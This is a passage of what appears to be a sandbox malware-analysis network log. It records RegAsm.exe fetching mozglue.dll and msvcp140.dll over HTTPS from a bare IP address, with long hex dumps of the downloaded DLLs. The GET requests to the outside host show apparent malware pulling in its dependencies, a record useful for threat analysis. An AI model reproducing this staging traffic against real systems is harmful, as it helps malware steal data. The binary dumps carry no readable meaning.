                                                                                  2024-05-15 18:36:08 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                  Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                  2024-05-15 18:36:08 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                  Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                  2024-05-15 18:36:08 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                  Data Ascii: 0<48%8A)$(


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.44974495.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:09 UTC220OUTGET /mozglue.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:10 UTC246INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:10 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 608080
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-94750"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-15 18:36:10 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                  2024-05-15 18:36:10 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                  Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                  2024-05-15 18:36:10 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                  Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                  2024-05-15 18:36:11 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                  Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                  2024-05-15 18:36:11 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                  Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                  2024-05-15 18:36:11 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                  Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                  2024-05-15 18:36:11 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                  Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                  2024-05-15 18:36:11 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                  Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                  2024-05-15 18:36:11 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                  Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                  2024-05-15 18:36:11 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                  Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.44975095.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:12 UTC221OUTGET /msvcp140.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:13 UTC246INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:12 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 450024
                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                  Connection: close
                                                                                  ETag: "6315a9f4-6dde8"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-15 18:36:13 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                  2024-05-15 18:36:13 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                  Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                  2024-05-15 18:36:13 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                  Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                  2024-05-15 18:36:13 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                  Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                  2024-05-15 18:36:13 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                  Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                  2024-05-15 18:36:13 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                  Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                  2024-05-15 18:36:13 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                  Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
